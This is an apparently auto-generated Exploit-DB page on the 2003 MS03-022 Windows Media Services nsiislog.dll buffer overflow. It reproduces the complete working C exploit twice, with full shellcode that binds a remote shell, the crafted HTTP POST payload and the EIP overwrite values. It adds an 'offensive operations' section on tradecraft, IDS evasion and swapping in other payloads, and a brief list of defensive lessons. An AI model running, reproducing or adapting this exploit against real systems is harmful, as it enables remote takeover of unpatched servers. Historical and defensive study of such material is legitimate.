By exploitdb papers bot•July 1, 2003•

papers

Understanding the Microsoft Windows Media Services Remote Command Execution Exploit (MS03-022)

What this paper is

This paper, published by firew0rker on July 1, 2003, details a remote command execution vulnerability in Microsoft Windows Media Services. The exploit targets a specific buffer overflow condition within the nsiislog.dll component, allowing an attacker to execute arbitrary code on a vulnerable server. The exploit code provided is a C program that crafts a malicious HTTP request to trigger this vulnerability.

Simple technical breakdown

The core of the vulnerability lies in how the Windows Media Services handles certain HTTP requests. Specifically, it appears to be vulnerable to a buffer overflow when processing a malformed request targeting the nsiislog.dll script. The exploit works by sending an oversized and specially crafted HTTP POST request. This request overwrites a critical memory buffer, including the instruction pointer (EIP), with attacker-controlled data. By carefully placing shellcode and a specific EIP value, the attacker can redirect the program's execution flow to their shellcode, leading to remote code execution.

The exploit leverages a buffer overflow in the nsiislog.dll component, likely triggered by an overly long or malformed MX_STATS_LogLine request. The attacker sends a crafted HTTP POST request that includes:

A target path: This is typically /scripts/nsiislog.dll or a renamed version.
A large buffer: This buffer is filled with padding and the shellcode.
A specific EIP overwrite: This value points to a location in memory where the shellcode will reside, effectively hijacking the program's execution flow.

Complete code and payload walkthrough

The provided C code implements the exploit. Let's break it down section by section.

Includes and Definitions:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#ifdef WIN32
#include <winsock.h>
#pragma comment(lib, "wsock32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#define SOCKET int
#define DWORD uint32_t
#define ULONG unsigned long
#define INVALID_SOCKET -1
#define SOCKET_ERROR -1
#define closesocket close
#endif

Purpose: This section includes standard C libraries for input/output, string manipulation, and memory allocation. It also handles platform-specific socket programming.
#ifdef WIN32 / #else: This preprocessor directive allows the code to compile on both Windows (WIN32) and Unix-like systems.
- On Windows, it includes winsock.h for Windows Sockets API and links wsock32.lib.
- On other systems (like Linux), it includes POSIX socket headers and defines macros (SOCKET, DWORD, ULONG, INVALID_SOCKET, SOCKET_ERROR, closesocket) to provide a consistent interface with the Windows Sockets API.
pragma comment(lib, "wsock32"): This is a Microsoft-specific directive to link the wsock32.lib library, which contains Windows Sockets functions.

Shellcode Definition:

char shellcode[]=
//"\x90\x90\x90\x90\x90\x90\x90\xCC" //¤«ï ®â« ¤ª¨
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
"\xff\x5b\x81\xeb\x4d\x43\x22\x11"
"\x8b\xc3\x05\x66\x43\x22\x11\x66"
// ... (entire shellcode byte array) ...
"\xe9\xc4\xfc\xff\xff\x74\xf9\x75\xf7";

Purpose: This array contains the actual machine code (shellcode) that will be executed on the target system once the exploit is successful.
Content: The bytes represent instructions for a processor. Without detailed disassembly and analysis of this specific shellcode, its exact function is unknown. However, typical shellcode for this era often aims to:
- Establish a reverse shell connection back to the attacker.
- Spawn a command shell (cmd.exe).
- Bind a shell to a specific port on the target.
Comments: The commented-out line //"\x90\x90\x90\x90\x90\x90\x90\xCC" //¤«ï ®â« ¤ª¨ likely represents a placeholder or a different version of shellcode, possibly for debugging (NOPs followed by an INT 3 for breakpoint). The non-commented bytes are the active shellcode. The characters after the comment are likely non-ASCII characters from the original source, not part of the code.

Constants and Buffer Declarations:

const DWORD default_EIP_pos = 9992; //¯®«®¦¥¨¥ EIP ¢ ¡ãä¥à¥ (sploit)
const DWORD default_EBX_points_to = 9988; //ãª § â¥«ì ¢ EBX ®â®á¨â¥«ì® sploit
//const DWORD default_EIP_value = 0x77F8441B; //¯® íâ®¬ã  ¤à. ¤.¡. JMP EDX, ¢ ¤ ®¬ á«ãç ¥ íâ® ¢ ntdll.dll
const DWORD default_EIP_value = 0x40F01333;
//const default_EDX_points_to = 0x1000; //íâ® ¥ ¯à¨£®¤¨«®áì
char *nsiislog_default = "/scripts/nsiislog.dll";
char sploit[default_EIP_pos+4+sizeof(shellcode)+1];
char sploitbuf[sizeof(sploit)*2];

Purpose: These define key parameters for the exploit and declare buffers to hold the crafted exploit payload.
default_EIP_pos: This constant defines the offset within the sploit buffer where the attacker wants to overwrite the Instruction Pointer (EIP). This is the crucial part for redirecting execution.
default_EBX_points_to: This constant likely indicates a memory address or offset that the EBX register should point to. EBX is often used in shellcode for addressing data or the shellcode itself. The comment suggests it's related to where the shellcode is placed.
default_EIP_value: This is the specific address that will be written into EIP. The commented-out value 0x77F8441B points to a JMP EDX instruction in ntdll.dll, a common technique to indirectly jump to shellcode. The active value 0x40F01333 is likely an address within the vulnerable service's memory space or a loaded module that points to the shellcode.
nsiislog_default: The default path to the vulnerable DLL.
sploit: A large character array that will hold the complete exploit payload, including the HTTP request prefix, padding, shellcode, and the EIP overwrite. Its size is calculated to accommodate the default_EIP_pos, some extra space, the shellcode, and a null terminator.
sploitbuf: A buffer to hold the final HTTP request string, which is potentially larger than the sploit buffer due to headers.

Usage Function:

void usage(char* argv[])
{
       printf("Dicklamer (: "
	"We are not responsible for the illegal use of this software.\n"
	"Description: Binds shell to port 34816 (or higher if port busy).\n"
	"Usage:	"
	"%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\n"
	"Supported target(s):\n"
	"Windows version\t\t\t\tnsiislog.dll version\n"
	"------------------------------------------------------------\n"
	"2000 [5.00.2195] server rus.\t\t4.1.0.3917\n", argv[0]);
       exit(0);
}

Purpose: This function prints help information to the console and exits the program.
Content: It includes a disclaimer, a description of the exploit's functionality (binding a shell to a port), and the correct command-line syntax. It also lists supported target versions, indicating that the exploit is specific to certain Windows versions and nsiislog.dll versions.

Main Function:

int main(int argc, char* argv[])
{
#ifdef WIN32
	WSADATA wsaData;
#endif
	int target_port = 80;
	char *nsiislog = nsiislog_default;
	int		nArgIndex;

	if (argc<2) usage(argv);
	nArgIndex = 1;
	while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-'))
	{
		switch (argv[nArgIndex++][1])
		{
		case 'p':
		case 'P':
			target_port = atoi(argv[nArgIndex++]);
			continue;
		case 'r':
		case 'R':
			nsiislog = argv[nArgIndex++];
			continue;
		default:
			usage(argv);
		}
	}

	try {
#ifdef WIN32
		WSAStartup(0x0101, &wsaData);
#endif
		SOCKET s = socket(AF_INET,SOCK_STREAM,0);
		if (s == INVALID_SOCKET) throw("No socket");
		sockaddr_in addr;

		//Ž¯à¥¤¥«ï¥¬  ¤à¥á á¥à¢ ª
		ULONG iaddr = inet_addr(argv[1]);
		if (iaddr == INADDR_NONE) {//€¤à¥á - ¨¬ï á¥à¢ ª
			hostent *ph = gethostbyname(argv[1]);
			if (!ph) throw("Cant resolve hostname");
			memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr));
		} else {//€¤à¥á - IP
			memcpy(&addr.sin_addr.s_addr,&iaddr,4);
		};

		addr.sin_family = AF_INET;
		addr.sin_port   = htons(target_port);
		int sizeofaddr=sizeof(addr);

// ... (exploit payload construction) ...

		/*strcpy(sploit+sizeof(sploit)-11,"BCDEFGHIJK");*/
		sploit[sizeof(sploit)-1] = 0;

  if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw("Cant connect host");

		sprintf(sploitbuf,
			"POST %s HTTP/1.0\r\n"
			"Accept: */*\r\n"
			"User-Agent: NSPlayer/4.1.0.3917\r\n"
			"Content-Type: text/plain\r\n"
			"Content-Length: %i\r\n"
			"Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\r\n"
			"\r\n%s\r\n",
			nsiislog,strlen(sploit),sploit);

		int snd=send(s,sploitbuf,strlen(sploitbuf),0);
		if (snd == strlen(sploitbuf)) printf("Target exploited.\n");
			else throw("Cant send exploit");
		closesocket(s);
	}
	catch (char *errmsg)
	{

		printf("%s\n",errmsg);
		return -1;
	}
	catch (int err_n)
	{
		printf("error %i\n",err_n);
		return err_n;
	}
#ifdef WIN32
    WSACleanup();
#endif
	return 0;
}

Purpose: This is the main execution entry point of the program. It handles command-line arguments, initializes network sockets, resolves the target host, constructs the exploit payload, sends it, and cleans up.
Argument Parsing:
- It checks if at least one argument (the target IP/hostname) is provided.
- It parses optional arguments:
  - -p or -P: Specifies the target port (defaults to 80).
  - -r or -R: Specifies a custom path for the nsiislog.dll if it's been renamed on the server.
Network Initialization:
- WSAStartup(0x0101, &wsaData); (Windows only): Initializes the Windows Sockets API.
- SOCKET s = socket(AF_INET,SOCK_STREAM,0);: Creates a TCP socket.
- Host Resolution:
  - It attempts to resolve the target hostname using inet_addr.
  - If inet_addr fails (returns INADDR_NONE), it uses gethostbyname to resolve the hostname to an IP address.
- addr.sin_family = AF_INET;: Sets the address family to IPv4.
- addr.sin_port = htons(target_port);: Sets the target port, converting it to network byte order.
Exploit Payload Construction: This is the critical part.
```
char *req = "MX_STATS_LogLine: ";
strcpy(sploit, req);
memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req));
//memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*ã¡à âì \0*/);
memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*ã¡à âì \0*/);
//¯à¨ ¯¥à¥å®¤¥   EIP, EBX ¡ã¤¥â ãª §ë¢ âì   ¯®á«¥¤¨© DWORD  è¥£® § ¯à®á , £¤¥ JZ/JNZ
memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value);

/*strcpy(sploit+sizeof(sploit)-11,"BCDEFGHIJK");*/
sploit[sizeof(sploit)-1] = 0;
```
- char *req = "MX_STATS_LogLine: ";: Defines the beginning of the malicious request string. This is the command or identifier that triggers the vulnerability.
- strcpy(sploit, req);: Copies the request prefix into the sploit buffer.
- memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req));: Fills the buffer with 0xCC (INT 3, often used as a placeholder or for debugging) from the end of the request string up to the default_EIP_pos. This creates the "padding" to reach the overwrite point.
- memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*ã¡à âì \0*/);: This line places the shellcode into the sploit buffer. The offset calculation default_EBX_points_to-(sizeof(shellcode)-1)+4 is complex and suggests that the shellcode is being placed at a specific relative location, possibly adjusted to align with the EBX register's expected position or to ensure it's within the overflowed buffer and executable. The -1 is to avoid copying the null terminator of the shellcode array.
- memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value);: This is the critical step where the attacker overwrites the Instruction Pointer (EIP) at default_EIP_pos with the default_EIP_value. This redirects execution to the specified address.
- sploit[sizeof(sploit)-1] = 0;: Null-terminates the sploit buffer.
Connection and Sending:
- connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)): Attempts to establish a connection to the target.
- sprintf(sploitbuf, ...): Formats the final HTTP request string, including headers like User-Agent, Content-Type, Content-Length, and the crafted sploit buffer as the body. The User-Agent string NSPlayer/4.1.0.3917 is significant as it matches the version mentioned in the usage function, indicating a specific target.
- send(s,sploitbuf,strlen(sploitbuf),0);: Sends the complete HTTP request to the server.
- printf("Target exploited.\n");: If send is successful, it prints a success message.
Error Handling: The try...catch blocks handle potential errors during socket operations, connection, or sending.
Cleanup:
- closesocket(s);: Closes the socket.
- WSACleanup(); (Windows only): Cleans up the Windows Sockets API resources.

Mapping of code fragments to practical purposes:

#include <winsock.h> / POSIX socket headers: Purpose: Network communication setup. Practical: Enables sending and receiving data over TCP/IP.
char shellcode[]= ...: Purpose: Malicious payload. Practical: Contains the instructions to be executed on the target (e.g., bind shell).
default_EIP_pos: Purpose: Offset for EIP overwrite. Practical: Determines where in the buffer the return address is overwritten.
default_EBX_points_to: Purpose: Offset related to shellcode placement. Practical: Helps position the shellcode correctly in memory for execution.
default_EIP_value: Purpose: Target address for EIP. Practical: The address the program will jump to after the overflow, usually pointing to the shellcode.
nsiislog_default: Purpose: Target script path. Practical: The specific file on the server that is vulnerable.
sploit buffer: Purpose: Holds the entire exploit payload. Practical: Constructed to cause the buffer overflow and deliver shellcode.
usage() function: Purpose: Displays help and disclaimer. Practical: Informs the user about how to run the exploit and its limitations.
main() function: Purpose: Orchestrates the exploit. Practical: Handles target resolution, connection, payload construction, and delivery.
Argument parsing (-p, -r): Purpose: Configures exploit parameters. Practical: Allows customization of target port and DLL path.
socket(), connect(): Purpose: Establish network connection. Practical: Connects to the vulnerable service on the target.
inet_addr(), gethostbyname(): Purpose: Resolve target IP address. Practical: Finds the IP address of the target hostname.
memset(sploit+strlen(sploit), 0xCC, ...): Purpose: Fill buffer with padding. Practical: Extends the initial request to reach the overflow point.
memcpy(sploit+..., shellcode, ...): Purpose: Inject shellcode. Practical: Places the executable payload into the buffer.
memcpy(sploit+default_EIP_pos, &default_EIP_value, ...): Purpose: Overwrite EIP. Practical: Redirects program execution to the shellcode.
sprintf(sploitbuf, ...): Purpose: Format HTTP request. Practical: Creates the complete HTTP request with headers and body.
send(): Purpose: Transmit exploit. Practical: Sends the crafted request to the target server.
closesocket(), WSACleanup(): Purpose: Clean up resources. Practical: Frees up network resources after the operation.

Practical details for offensive operations teams

Required Access Level: Network access to the target server is required. The exploit is remote and does not require local access or elevated privileges on the target system itself, beyond the ability to run the Windows Media Services.
Lab Preconditions:
- A vulnerable Windows server (e.g., Windows 2000 Server with the specific patch level not applied) running Windows Media Services.
- The nsiislog.dll component must be accessible via HTTP.
- Network connectivity between the attacker's machine and the target server on the target port (default 80 for HTTP, or a custom port).
- Firewalls must allow traffic to the target port.
Tooling Assumptions:
- A C compiler (like MinGW or Visual Studio on Windows, or GCC on Linux) to compile the exploit code.
- Standard networking utilities.
Execution Pitfalls:
- Patching: The vulnerability was patched by Microsoft as MS03-022. Any patched system will not be vulnerable.
- nsiislog.dll Location/Renaming: The exploit assumes nsiislog.dll is in the /scripts/ directory. If it has been moved or renamed, the -r option must be used with the correct path.
- EIP/Shellcode Address: The default_EIP_value and the shellcode placement offset (default_EBX_points_to) are highly dependent on the specific version of Windows Media Services and the loaded modules. If the target environment differs even slightly (e.g., different service pack, different DLL base addresses), these values may need to be re-calculated. This often requires debugging or fuzzing.
- Network Latency/Reliability: Unreliable network connections can cause the send operation to fail or the connection to drop before the exploit is fully processed.
- Service Restart: If the Windows Media Services crashes due to the exploit, it might restart automatically, or it might require manual intervention.
- Firewall/IDS Evasion: The HTTP request is relatively standard, but the large payload and specific User-Agent might be flagged by Intrusion Detection Systems (IDS) or Web Application Firewalls (WAFs).
Tradecraft Considerations:
- Reconnaissance: Identify target systems running Windows Media Services and determine their patch status. Tools like Nmap with specific scripts or vulnerability scanners can help.
- Payload Customization: The shellcode might need modification to achieve specific objectives (e.g., reverse shell to a specific IP/port, download and execute a different payload).
- Stealth: While the exploit itself is noisy (a direct HTTP request), the post-exploitation activities should focus on stealth.
- Error Handling: The exploit's error handling is basic. In a real engagement, more robust error checking and logging would be beneficial.
Likely Failure Points:
- Target system is patched.
- Incorrect default_EIP_value or shellcode placement for the target environment.
- Firewall blocking the connection.
- nsiislog.dll is not found at the expected location.
- The service crashes before the shellcode can execute or before a connection can be established.
- The shellcode itself fails to execute correctly.

Where this was used and when

This exploit targets a vulnerability that was disclosed and patched in July 2003 as part of Microsoft Security Bulletin MS03-022. Exploits for this vulnerability would have been actively used by attackers in the period immediately following its disclosure and before widespread patching occurred. It's highly unlikely to be effective against modern, patched systems. Its historical significance lies in demonstrating a critical remote code execution flaw in a widely used Microsoft service at the time.

Defensive lessons for modern teams

Timely Patching: This vulnerability highlights the critical importance of applying security patches promptly. MS03-022 was a severe remote code execution flaw that could have been easily exploited on unpatched systems.
Service Hardening: Services like Windows Media Services should be configured securely, with unnecessary components disabled and access restricted.
Network Segmentation: Isolating critical servers and services from the public internet and from less trusted internal networks can limit the attack surface.
Intrusion Detection/Prevention Systems (IDS/IPS): Modern IDS/IPS can detect anomalous HTTP requests, including those with unusually large payloads or suspicious patterns, potentially flagging this exploit attempt.
Vulnerability Management: Regular vulnerability scanning and penetration testing are essential to identify and remediate such weaknesses before they can be exploited.
Principle of Least Privilege: Ensure that services run with the minimum necessary privileges to limit the impact of a compromise.
Logging and Monitoring: Comprehensive logging of network traffic and service activity can help detect and investigate exploit attempts.

ASCII visual (if applicable)

This exploit relies on a network-based buffer overflow. A simplified visual representation of the attack flow:

+-----------------+       +---------------------------+       +-----------------------+
| Attacker Machine| ----> | Target Server (Internet)  | ----> | Windows Media Service |
| (Exploit Code)  |       | (Firewall/Network)        |       | (nsiislog.dll)        |
+-----------------+       +---------------------------+       +-----------------------+
        |                                                               |
        | 1. Send crafted HTTP POST request                               |
        |    (with oversized buffer, shellcode, EIP overwrite)            |
        |                                                               |
        +--------------------------------------------------------------->
                                                                        |
                                                                        | 2. Vulnerable service
                                                                        |    receives request.
                                                                        |    Buffer overflow occurs.
                                                                        |
                                                                        | 3. EIP is overwritten
                                                                        |    with default_EIP_value.
                                                                        |
                                                                        | 4. Execution jumps to
                                                                        |    shellcode.
                                                                        |
                                                                        | 5. Shellcode executes
                                                                        |    (e.g., bind shell).
                                                                        |
                                                                        +-----------------------+

Source references

Paper ID: 48
Paper Title: Microsoft Windows Media Services - Remote (MS03-022)
Author: firew0rker
Published: 2003-07-01
Keywords: Windows, remote
Paper URL: https://www.exploit-db.com/papers/48
Raw URL: https://www.exploit-db.com/raw/48
Microsoft Security Bulletin: MS03-022

Original Exploit-DB Content (Verbatim)

// Windows Media Services Remote Command Execution #2
// v. 1.0 beta
// (c) firew0rker  //tN  [The N0b0D1eS]

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#ifdef WIN32
#include <winsock.h>
#pragma comment(lib, "wsock32")
#else 
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#define SOCKET int
#define DWORD uint32_t
#define ULONG unsigned long
#define INVALID_SOCKET -1
#define SOCKET_ERROR -1
#define closesocket close
#endif

char shellcode[]=
//"\x90\x90\x90\x90\x90\x90\x90\xCC" //¤«ï ®â« ¤ª¨
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
"\xff\x5b\x81\xeb\x4d\x43\x22\x11"
"\x8b\xc3\x05\x66\x43\x22\x11\x66"
"\xb9\x15\x03\x80\x30\xfb\x40\x67"
"\xe2\xf9\x33\xa3\xf9\xfb\x72\x66"
"\x53\x06\x04\x04\x76\x66\x37\x06"
"\x04\x04\xa8\x40\xf6\xbd\xd9\xea"
"\xf8\x66\x53\x06\x04\x04\xa8\x93"
"\xfb\xfb\x04\x04\x13\x91\xfa\xfb"
"\xfb\x43\xcd\xbd\xd9\xea\xf8\x7e"
"\x53\x06\x04\x04\xab\x04\x6e\x37"
"\x06\x04\x04\xf0\x3b\xf4\x7f\xbe"
"\xfa\xfb\xfb\x76\x66\x3b\x06\x04"
"\x04\xa8\x40\xba\xbd\xd9\xea\xf8"
"\x66\x53\x06\x04\x04\xa8\xab\x13"
"\xcc\xfa\xfb\xfb\x76\x7e\x8f\x05"
"\x04\x04\xab\x93\xfa\xfa\xfb\xfb"
"\x04\x6e\x4b\x06\x04\x04\xc8\x20"
"\xa8\xa8\xa8\x91\xfd\x91\xfa\x91"
"\xf9\x04\x6e\x3b\x06\x04\x04\x72"
"\x7e\xa7\x05\x04\x04\x9d\x3c\x7e"
"\x9f\x05\x04\x04\xf9\xfb\x9d\x3c"
"\x7e\x9d\x05\x04\x04\x73\xfb\x3c"
"\x7e\x93\x05\x04\x04\xfb\xfb\xfb"
"\xfb\x76\x66\x9f\x05\x04\x04\x91"
"\xeb\xa8\x04\x4e\xa7\x05\x04\x04"
"\x04\x6e\x47\x06\x04\x04\xf0\x3b"
"\x8f\xe8\x76\x6e\x9c\x05\x04\x04"
"\x05\xf9\x7b\xc1\xfb\xf4\x7f\x46"
"\xfb\xfb\xfb\x10\x2f\x91\xfa\x04"
"\x4e\xa7\x05\x04\x04\x04\x6e\x43"
"\x06\x04\x04\xf0\x3b\xf4\x7e\x5e"
"\xfb\xfb\xfb\x3c\x7e\x9b\x05\x04"
"\x04\xeb\xfb\xfb\xfb\x76\x7e\x9b"
"\x05\x04\x04\xab\x76\x7e\x9f\x05"
"\x04\x04\xab\x04\x4e\xa7\x05\x04"
"\x04\x04\x6e\x4f\x06\x04\x04\x72"
"\x7e\xa3\x05\x04\x04\x07\x76\x46"
"\xf3\x05\x04\x04\xc8\x3b\x42\xbf"
"\xfb\xfb\xfb\x08\x51\x3c\x7e\xcf"
"\x05\x04\x04\xfb\xfa\xfb\xfb\x70"
"\x7e\xa3\x05\x04\x04\x72\x7e\xbf"
"\x05\x04\x04\x72\x7e\xb3\x05\x04"
"\x04\x72\x7e\xbb\x05\x04\x04\x3c"
"\x7e\xf3\x05\x04\x04\xbf\xfb\xfb"
"\xfb\xc8\x20\x76\x7e\x03\x06\x04"
"\x04\xab\x76\x7e\xf3\x05\x04\x04"
"\xab\xa8\xa8\x93\xfb\xfb\xfb\xf3"
"\x91\xfa\xa8\xa8\x43\x8c\xbd\xd9"
"\xea\xf8\x7e\x53\x06\x04\x04\xab"
"\xa8\x04\x6e\x3f\x06\x04\x04\x04"
"\x4e\xa3\x05\x04\x04\x04\x6e\x57"
"\x06\x04\x04\x12\xa0\x04\x04\x04"
"\x04\x6e\x33\x06\x04\x04\x13\x76"
"\xfa\xfb\xfb\x33\xef\xfb\xfb\xac"
"\xad\x13\xfb\xfb\xfb\xfb\x7a\xd7"
"\xdf\xf9\xbe\xd9\xea\x43\x0e\xbe"
"\xd9\xea\xf8\xff\xdf\x78\x3f\xff"
"\xab\x9f\x9c\x04\xcd\xfb\xfb\x72"
"\x9e\x03\x13\xfb\xfb\xfb\xfb\x7a"
"\xd7\xdf\xd8\xbe\xd9\xea\x43\xac"
"\xbe\xd9\xea\xf8\xff\xdf\x78\x3f"
"\xff\x72\xbe\x07\x9f\x9c\x72\xdd"
"\xfb\xfb\x70\x86\xf3\x9d\x7a\xc4"
"\xb6\xa1\x8e\xf4\x70\x0c\xf8\x8d"
"\xc7\x7a\xc5\xab\xbe\xfb\xfb\x8e"
"\xf9\x10\xf3\x7a\x14\xfb\xfb\xfa"
"\xfb\x10\x19\x72\x86\x0b\x72\x8e"
"\x17\x70\x86\xf7\x42\x6d\xfb\xfb"
"\xfb\xc9\x3b\x09\x55\x72\x86\x0f"
"\x70\x34\xd0\xb6\xf7\x70\xad\x83"
"\xf8\xae\x0b\x70\xa1\xdb\xf8\xa6"
"\x0b\xc8\x3b\x70\xc0\xf8\x86\x0b"
"\x70\x8e\xf7\xaa\x08\x5d\x8e\xfe"
"\x78\x3f\xff\x10\xf1\xa2\x78\x38"
"\xff\xbb\xc0\xb9\xe3\x8e\x1f\xc0"
"\xb9\xe3\x8e\xf9\x10\xb8\x70\x89"
"\xdf\xf8\x8e\x0b\x2a\x1b\xf8\x3d"
"\xf4\x4c\xfb\x70\x81\xe7\x3a\x1b"
"\xf9\xf8\xbe\x0b\xf8\x3c\x70\xfb"
"\xf8\xbe\x0b\x70\xb6\x0f\x72\xb6"
"\xf7\x70\xa6\xeb\x72\xf8\x78\x96"
"\xeb\xff\x70\x8e\x17\x7b\xc2\xfb"
"\x8e\x7c\x9f\x9c\x74\xfd\xfb\xfb"
"\x78\x3f\xff\xa5\xa4\x32\x39\xf7"
"\xfb\x70\x86\x0b\x12\x99\x04\x04"
"\x04\x33\xfb\xfb\xfb\x70\xbe\xeb"
"\x7a\x53\x67\xfb\xfb\xfb\xfb\xfb"
"\xfa\xfb\x43\xfb\xfb\xfb\xfb\x32"
"\x38\xb7\x94\x9a\x9f\xb7\x92\x99"
"\x89\x9a\x89\x82\xba\xfb\xbe\x83"
"\x92\x8f\xab\x89\x94\x98\x9e\x88"
"\x88\xfb\xb8\x89\x9e\x9a\x8f\x9e"
"\xab\x89\x94\x98\x9e\x88\x88\xba"
"\xfb\xfb\xac\xa8\xc9\xa4\xc8\xc9"
"\xd5\xbf\xb7\xb7\xfb\xac\xa8\xba"
"\xa8\x94\x98\x90\x9e\x8f\xba\xfb"
"\x99\x92\x95\x9f\xfb\x97\x92\x88"
"\x8f\x9e\x95\xfb\x9a\x98\x98\x9e"
"\x8b\x8f\xfb\xac\xa8\xba\xa8\x8f"
"\x9a\x89\x8f\x8e\x8b\xfb\x98\x97"
"\x94\x88\x9e\x88\x94\x98\x90\x9e"
"\x8f\xfb\xfb\x98\x96\x9f\xfb\xe9"
"\xc4\xfc\xff\xff\x74\xf9\x75\xf7";


const DWORD default_EIP_pos = 9992; //¯®«®¦¥¨¥ EIP ¢ ¡ãä¥à¥ (sploit)
const DWORD default_EBX_points_to = 9988; //ãª § â¥«ì ¢ EBX ®â®á¨â¥«ì® sploit
//const DWORD default_EIP_value = 0x77F8441B; //¯® íâ®¬ã  ¤à. ¤.¡. JMP EDX, ¢ ¤ ®¬ á«ãç ¥ íâ® ¢ ntdll.dll
const DWORD default_EIP_value = 0x40F01333;
//const default_EDX_points_to = 0x1000; //íâ® ¥ ¯à¨£®¤¨«®áì
char *nsiislog_default = "/scripts/nsiislog.dll";
char sploit[default_EIP_pos+4+sizeof(shellcode)+1];
char sploitbuf[sizeof(sploit)*2];

void usage(char* argv[])
{
       printf("Dicklamer (: "
	"We are not responsible for the illegal use of this software.\n"
	"Description: Binds shell to port 34816 (or higher if port busy).\n"
	"Usage:	"
	"%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\n"
	"Supported target(s):\n"
	"Windows version\t\t\t\tnsiislog.dll version\n"
	"------------------------------------------------------------\n"
	"2000 [5.00.2195] server rus.\t\t4.1.0.3917\n", argv[0]);
       exit(0);
}

int main(int argc, char* argv[])
{
#ifdef WIN32
	WSADATA wsaData;        
#endif
	int target_port = 80;
	char *nsiislog = nsiislog_default;
	int		nArgIndex;

	if (argc<2) usage(argv);
	nArgIndex = 1;
	while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-'))
	{
		switch (argv[nArgIndex++][1])
		{
		case 'p':
		case 'P':
			target_port = atoi(argv[nArgIndex++]);
			continue;
		case 'r':
		case 'R':
			nsiislog = argv[nArgIndex++];
			continue;
		default:
			usage(argv);
		}
	}
	
	try {
#ifdef WIN32
		WSAStartup(0x0101, &wsaData);
#endif
		SOCKET s = socket(AF_INET,SOCK_STREAM,0);
		if (s == INVALID_SOCKET) throw("No socket");
		sockaddr_in addr;
		
		//Ž¯à¥¤¥«ï¥¬  ¤à¥á á¥à¢ ª 
		ULONG iaddr = inet_addr(argv[1]);
		if (iaddr == INADDR_NONE) {//€¤à¥á - ¨¬ï á¥à¢ ª 
			hostent *ph = gethostbyname(argv[1]);
			if (!ph) throw("Cant resolve hostname");
			memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr));
		} else {//€¤à¥á - IP
			memcpy(&addr.sin_addr.s_addr,&iaddr,4);
		};
		
		addr.sin_family = AF_INET;
		addr.sin_port   = htons(target_port);
		int sizeofaddr=sizeof(addr);

char *req = "MX_STATS_LogLine: ";
strcpy(sploit, req);
memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req));
//memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*ã¡à âì \0*/);
memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*ã¡à âì \0*/);
//¯à¨ ¯¥à¥å®¤¥   EIP, EBX ¡ã¤¥â ãª §ë¢ âì   ¯®á«¥¤¨© DWORD  è¥£® § ¯à®á , £¤¥ JZ/JNZ
memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value);
		
		/*strcpy(sploit+sizeof(sploit)-11,"BCDEFGHIJK");*/
		sploit[sizeof(sploit)-1] = 0;
		
  if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw("Cant connect host");

		sprintf(sploitbuf,
			"POST %s HTTP/1.0\r\n"
			"Accept: */*\r\n"
			"User-Agent: NSPlayer/4.1.0.3917\r\n"
			"Content-Type: text/plain\r\n"
			"Content-Length: %i\r\n"
			"Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\r\n"
			"\r\n%s\r\n",
			nsiislog,strlen(sploit),sploit);
		
		int snd=send(s,sploitbuf,strlen(sploitbuf),0);
		if (snd == strlen(sploitbuf)) printf("Target exploited.\n");
			else throw("Cant send exploit");
		closesocket(s);
	}
	catch (char *errmsg) 
	{
		
		printf("%s\n",errmsg);
		return -1;
	}
	catch (int err_n) 
	{
		printf("error %i\n",err_n);
		return err_n;
	}
#ifdef WIN32
    WSACleanup();
#endif
	return 0;
}


// milw0rm.com [2003-07-01]